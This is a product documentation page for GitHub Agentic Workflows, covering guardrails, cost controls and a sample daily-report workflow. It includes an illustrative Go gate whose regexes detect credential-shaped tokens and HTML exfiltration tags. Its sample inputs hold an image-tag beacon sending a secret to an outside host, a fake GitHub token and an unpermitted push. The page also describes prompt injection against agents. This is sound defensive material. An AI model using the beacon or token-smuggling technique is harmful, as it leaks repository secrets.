GitHub Agentic Workflows
Wake up to ready-to-review repository improvements: automated triage, CI insights, docs updates, and test enhancements, all from simple markdown workflows.
GitHub Agentic Workflows deliver this: repository automation that runs the coding agents you already use inside GitHub Actions, with strong guardrails and security-first design principles.
Use GitHub Copilot, Claude by Anthropic, Gemini from Google or OpenAI Codex for event-triggered and scheduled jobs to improve your repository. GitHub Agentic Workflows augment your existing, deterministic CI/CD with Continuous AI capabilities.
Developed by GitHub and Microsoft, workflows run with added guardrails: safe outputs and sandboxed execution help keep your repository safe.
ⓘ Note: GitHub Agentic Workflows is in early development and may change significantly. Using agentic workflows requires careful attention to security considerations and careful human supervision, and even then things can still go wrong. Use it with caution, and at your own risk.
Key Features
Simple Markdown Files
Write automation in plain markdown instead of complex YAML
AI-Powered Decision Making
Workflows that understand context and adapt to situations
Multiple AI Engines
Support for Copilot, Claude, Codex, and custom AI processors
GitHub Integration
Deep integration with Actions, Issues, PRs, Discussions, and repository management
Safety First
Sandboxed execution with minimal permissions and safe output processing
Cost Controls
Per-run AI credit budgets, spend visibility, and OpenTelemetry cost analysis
Guardrails Built-In
AI agents can be manipulated by prompt injection, malicious repository content, or compromised tools. GitHub Agentic Workflows uses layered controls to keep each run contained: sandboxing limits where code can execute, scoped permissions limit what the agent can request, and gated outputs ensure only approved actions reach GitHub.
```mermaid
flowchart LR
    INPUT["Repository + Prompt Input"] --> TOKENS["Read-only Token"]
    TOKENS --> SECRETS["No Secrets in Agent"]
    SECRETS --> SANDBOX["Sandbox + Network Firewall"]
    SANDBOX --> SAFE["Safe Outputs Gate"]
    SAFE --> DETECT["Threat Detection Scan"]
    DETECT --> APPLY["Scoped Write Job"]
```
Read-only token
The agent can read repository state, but it cannot push commits or write to issues directly; writes happen only through the safe outputs path.
No secrets in agent runtime
Sensitive credentials stay in isolated downstream jobs, not inside the agent process.
Sandbox + network firewall
The agent runs in a container behind the Agent Workflow Firewall and can only reach allowed destinations.
Safe outputs gate
Requested actions are validated against your configured safe outputs policy before anything is applied.
Threat detection
A dedicated threat detection job scans proposed outputs and blocks suspicious changes.
Compile-time validation
Schema validation, expression allowlisting, action pinning, and security scanners reject misconfigurations before deployment.
See the Security Architecture for a full breakdown of the layered defense-in-depth model.
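The safe outputs gate and threat detection steps described above, modelled as an added example in Go (gh-aw itself is written in Go, but this is not the project's code and does not use its real schema or file format). It assumes the agent's requested actions arrive as one JSON object per line, that the policy mirrors the `safe-outputs` frontmatter shape used in the Daily Issues Report example on this page, and that threat detection is two illustrative regexes (credential-shaped strings and raw HTML tags). The types, functions, policy values and sample output lines are all constructed for this illustration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// Policy is an illustrative model of a safe-outputs configuration: which
// action types the workflow author permitted and the constraints on them.
// (Assumed shape for this example, not gh-aw's real schema.)
type Policy struct {
	AllowedTypes map[string]bool // e.g. {"create-issue": true}
	TitlePrefix  string          // forced onto every created issue title
	Labels       []string        // policy labels replace whatever the agent asked for
	MaxPerRun    int             // hard cap on applied actions per run
}

// Proposed is one action the agent requested, decoded from a JSONL line.
type Proposed struct {
	Type   string   `json:"type"`
	Title  string   `json:"title"`
	Body   string   `json:"body"`
	Labels []string `json:"labels"`
}

// Decision is the gate's verdict on one proposed action. Action is the
// normalized form that the downstream scoped write job would apply.
type Decision struct {
	Index   int
	Allowed bool
	Reason  string
	Action  Proposed
}

// Illustrative threat-detection patterns: GitHub/AWS token shapes that an
// injected prompt might try to smuggle into an issue, and raw HTML tags that
// can act as exfiltration beacons (e.g. an <img> fetching an attacker URL).
var (
	secretLike = regexp.MustCompile(`\b(ghp|gho|ghs)_[A-Za-z0-9]{20,}\b|\bAKIA[0-9A-Z]{16}\b`)
	htmlTag    = regexp.MustCompile(`(?i)<\s*(img|script|iframe)\b`)
)

// Gate validates each proposed action against the policy and threat checks.
// Nothing the agent wrote is trusted as-is: unknown types are dropped, the
// prefix and labels are imposed by policy, and the per-run cap is enforced.
func Gate(p Policy, jsonl string) []Decision {
	var out []Decision
	applied := 0
	for i, line := range strings.Split(strings.TrimSpace(jsonl), "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		d := Decision{Index: i}
		var a Proposed
		if err := json.Unmarshal([]byte(line), &a); err != nil {
			d.Reason = "malformed output: " + err.Error()
			out = append(out, d)
			continue
		}
		switch {
		case !p.AllowedTypes[a.Type]:
			d.Reason = fmt.Sprintf("type %q not in safe-outputs policy", a.Type)
		case secretLike.MatchString(a.Title) || secretLike.MatchString(a.Body):
			d.Reason = "threat detection: credential-shaped string in content"
		case htmlTag.MatchString(a.Body):
			d.Reason = "threat detection: raw HTML tag in body"
		case applied >= p.MaxPerRun:
			d.Reason = fmt.Sprintf("max per run (%d) exceeded", p.MaxPerRun)
		default:
			a.Title = p.TitlePrefix + strings.TrimPrefix(a.Title, p.TitlePrefix)
			a.Labels = append([]string(nil), p.Labels...)
			d.Allowed, d.Action = true, a
			applied++
		}
		out = append(out, d)
	}
	return out
}

// ExamplePolicy mirrors the Daily Issues Report frontmatter on this page.
func ExamplePolicy() Policy {
	return Policy{
		AllowedTypes: map[string]bool{"create-issue": true},
		TitlePrefix:  "[team-status] ",
		Labels:       []string{"report", "daily-status"},
		MaxPerRun:    1,
	}
}

// sampleOutputs is a constructed agent output: one legitimate report, one
// attempted push, one exfil beacon, one leaked token, one over-cap request.
const sampleOutputs = `{"type":"create-issue","title":"Daily status","body":"3 PRs merged, CI green.","labels":["urgent"]}
{"type":"push-to-branch","title":"","body":"git push origin main"}
{"type":"create-issue","title":"Status","body":"See <img src=\"https://example.invalid/x.png?d=secret\">"}
{"type":"create-issue","title":"Leak","body":"token: ghp_abcdefghijklmnopqrstuvwxyz0123"}
{"type":"create-issue","title":"Second report","body":"ok"}`

func main() {
	for _, d := range Gate(ExamplePolicy(), sampleOutputs) {
		if d.Allowed {
			fmt.Printf("#%d APPLY %s %q labels=%v\n", d.Index, d.Action.Type, d.Action.Title, d.Action.Labels)
		} else {
			fmt.Printf("#%d BLOCK %s\n", d.Index, d.Reason)
		}
	}
}
```

The point of the gate is that it normalizes rather than trusts: the agent's own labels and title are overwritten from policy, an action type the author never enabled is discarded regardless of how reasonable it looks, and the cap bounds the blast radius of a run that has been talked into spamming. In the real architecture the surviving decisions are handed to a separate scoped write job that holds the write token the agent process never saw.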
Manage Cost and Capacity
Cost control starts with visibility. Use gh aw logs and gh aw audit to find the runs consuming the most time, tokens, and AI Credits (AIC), then tighten prompts, triggers, and model choices before spend drifts upward.
max-ai-credits gives each run a hard budget, while OpenTelemetry exports traces and token data to OTLP backends for dashboards, alerting, and cost analysis. To optimize over time, compare cost with outcomes so that lower spend still produces useful, accepted results.
Cost Management
Track Actions minutes, inference spend, and the heaviest runs before deciding what to optimize
OpenTelemetry
Export workflow traces to OTLP backends for dashboards, alerts, and spend analysis
AI Credits Budgets
Cap runaway runs with max-ai-credits and optimize around AI Credits usage
Example: Daily Issues Report
Here's a simple workflow that runs daily to create an upbeat status report:

```markdown
---
on:
  schedule: daily
permissions:
  contents: read
  issues: read
  pull-requests: read
safe-outputs:
  create-issue:
    title-prefix: "[team-status] "
    labels: [report, daily-status]
    close-older-issues: true
---

## Daily Issues Report

Create an upbeat daily status report for the team as a GitHub issue.

## What to include

- Recent repository activity (issues, PRs, discussions, releases, code changes)
- Progress tracking, goal reminders and highlights
- Project status and recommendations
- Actionable next steps for maintainers
```

The gh aw CLI compiles this into a hardened, traditional GitHub Actions workflow (.lock.yml) that runs an AI coding agent (Copilot CLI, Claude Code, Codex, ...) in a containerized environment, on a schedule or manually. Note that the agent itself only holds read permissions; the issue is created through the safe-outputs path. The agent reads your repository context, analyzes issues, generates visualizations, and creates reports, all defined in natural language rather than complex code.
Gallery
Issue & PR Management
Automated triage, labeling, and project coordination
Continuous Documentation
Continuous documentation maintenance and consistency
Continuous Improvement
Daily code simplification, refactoring, and style improvements
Metrics & Analytics
Daily reports, trend analysis, and workflow health monitoring
Quality & Testing
CI failure diagnosis, test improvements, and quality checks
Multi-Repository
Feature sync and cross-repo tracking workflows
Getting Started
Install the extension, add a sample workflow, and trigger your first run, all from the command line in minutes.
Creating Workflows
Create custom agentic workflows directly from the GitHub web interface using natural language.